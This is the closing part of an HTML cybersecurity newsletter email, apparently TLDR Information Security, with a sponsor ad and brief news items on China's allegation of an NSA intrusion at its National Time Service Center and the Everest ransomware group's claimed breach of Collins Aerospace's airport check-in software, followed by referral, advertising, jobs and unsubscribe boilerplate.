Looking for advanced threat protection with a lean team? Intrusion Shield for AWS draws on 30 years of IP and domain reputation history to write its own network rules in real time. <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.intrusion.com%2Fintrusion-shield-cloud-for-aws-tldr%2F%3Futm_campaign=22505002-AWS_Launch_2025%26utm_source=TLDR%26utm_medium=102025/2/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/wObxEqH1PlvrYRGq-9KFsbQxjn-PF_Ju6qdULKt2tEQ=427" rel="noopener noreferrer nofollow" target="_blank"><span>Start your free trial.</span></a>
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Flinks.tldrnewsletter.com%2FPKsHwp/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Kt9eKlUUC10f2aWY2JMCiIuDtyzClNRjv2Se7eVitTQ=427">
<span>
<strong>Beijing alleges โirrefutable evidenceโ linking US to major cyberattack on Chinese agency (2 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
China's State Security Ministry claims the NSA has been exploiting vulnerabilities in employees' mobile devices to gain unauthorized access to the National Time Service Center since 2022, using stolen credentials and 42 types of cyberattack tools to target the facility's timing systems and internal networks.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Flinks.tldrnewsletter.com%2FVBFkKX/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/T3tqx4TXsGfwf-_F3Hp9wLawFmSUngYRMV0Ox0p5HQk=427">
<span>
<strong>Collins Aerospace attack claimed by Everest, linking ransomware group to last month's European airport chaos (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
The Everest ransomware group claims responsibility for breaching Collins Aerospace's MUSE check-in software in September, allegedly exfiltrating 50GB of data and causing days of disruption at major European airports, including Heathrow, Brussels, Berlin, and Dublin, by forcing manual check-in operations.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="left" style="word-break: break-word; vertical-align: top; padding: 5px 10px;">
<p style="padding: 0; margin: 0; font-size: 22px; color: #000000; line-height: 1.6; font-weight: bold;">
Love TLDR? Tell your friends and get rewards!
</p>
</td>
</tr>
<tr>
<td class="container" style="padding: 0px 10px 15px;">
<div class="text-block">
Share your referral link below with friends to get free TLDR swag!
</div>
</td>
</tr>
<tr>
<td align="left" style="padding: 10px;">
<div class="text-block">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frefer.tldr.tech%2F78de0e20%2F8/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/lChCTEX_sL6ydjNuCZ6GzhaFrvxTnAWj-ZKCes0Lt7s=427" style="color: #464ba4; text-decoration: underline;">https://refer.tldr.tech/78de0e20/8</a>
</div>
</td>
</tr>
<tr></tr>
<tr>
<td align="left" style="padding:5px 10px;">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fhub.sparklp.co%2Fsub_d62447d5a74a%2F8/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/M6_kV_fDpGyKUni6XUuFRdOhdvXSI8r4_1uP9LbSY0E=427" style="font-size: 16px; line-height: 1.6; padding: 10px 0; display: inline-block; text-decoration: underline;"><span style="mso-text-raise:13pt; text-decoration: underline;">Track your referrals here.</span></a>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="left" style="word-break: break-word; vertical-align: top; padding: 5px 10px;">
<p style="padding: 0; margin: 0; font-size: 22px; color: #000000; line-height: 1.6; font-weight: bold;">
Want to advertise in TLDR? ๐ฐ
</p>
<div class="text-block" style="margin-top: 10px;">
If your company is interested in reaching an audience of cybersecurity professionals and decision makers, you may want to <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fadvertise.tldr.tech%2F%3Futm_source=tldrinfosec%26utm_medium=newsletter%26utm_campaign=advertisecta/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/aUneL38jfTHKnaUDYj83UeuW7csK87jwdRfXcyeUl5U=427"><strong><span>advertise with us</span></strong></a>.
</div>
<br>
<!-- New "Want to work at TLDR?" section -->
<p style="padding: 0; margin: 0; font-size: 22px; color: #000000; line-height: 1.6; font-weight: bold;">
Want to work at TLDR? ๐ผ
</p>
<div class="text-block" style="margin-top: 10px;">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fjobs.ashbyhq.com%2Ftldr.tech/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/-IHp8hsFsdjTZazyLmvOfUFqi5bpoMjwv9hZDjRCi9U=427" rel="noopener noreferrer" style="color: #0000EE; text-decoration: underline;" target="_blank"><strong>Apply here</strong></a> or send a friend's resume to <a href="mailto:jobs@tldr.tech" style="color: #0000EE; text-decoration: underline;">jobs@tldr.tech</a> and get $1k if we hire them!
</div>
<br>
<div class="text-block">
If you have any comments or feedback, just respond to this email!
<br>
<br> Thanks for reading,
<br>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.linkedin.com%2Fin%2Fprasannagautam%2F/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/bkz73uQqtNXziw_gnPLGOhmDz8ziZm1BsWfnJeWaQnU=427"><span>Prasanna Gautam</span></a>, <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.linkedin.com%2Fin%2Fericfernandezdelcampo%2F/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/kqvyiMUU6QEoLJtqHjsPXydffePdX_-7b6BtAwUqUz0=427"><span>Eric Fernandez</span></a> & <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.linkedin.com%2Fin%2Fsammy-tbeile%2F/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/46eUGULHsZ-1knYWOxkyC1m5ZbUoBLVpDtlB8aR9l9g=427"><span>Sammy Tbeile</span></a>
<br>
<br>
</div>
<br>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block" id="testing-id">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Ftldr.tech%2Finfosec%2Fmanage%3Femail=silk.theater.56%2540fwdnl.com/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/lgu4YZpQlNEHftn7BKOHzv5hnVoizpA0vXWgj5qqERE=427">Manage your subscriptions</a> to our other newsletters on tech, startups, and programming. Or if TLDR Information Security isn't for you, please <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fa.tldrnewsletter.com%2Funsubscribe%3Fep=1%26l=8d9cea11-3e94-11ed-9a32-0241b9615763%26lc=156924ca-84b7-11f0-8d58-47c5c04ad337%26p=dffbd6e8-ada1-11f0-aff1-39f1696b0a19%26pt=campaign%26pv=4%26spa=1760965321%26t=1760965664%26s=07465c1cca1569a7418eba2ab45ad4f9f62d51c52e6c52ed8a6dff530f04b89d/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/m25GVvM2kPyaUZXkCrs7kfXj_0abGL1Xsq6IoaL7Igw=427">unsubscribe</a>.
<br>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<img alt="" src="http://tracking.tldrnewsletter.com/CI0/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/kNR_mK8oiwhHsuJPASGcvB5ikRCRrdIaZTxHcTPHDQs=427" style="display: none; width: 1px; height: 1px;">
</body></html>